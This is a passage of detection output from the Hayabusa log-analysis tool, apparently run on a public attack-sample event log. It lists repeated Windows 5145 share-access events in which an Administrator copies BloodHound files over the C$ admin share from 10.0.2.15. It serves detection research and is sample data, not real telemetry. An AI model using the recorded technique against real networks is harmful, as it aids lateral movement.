Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 
10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 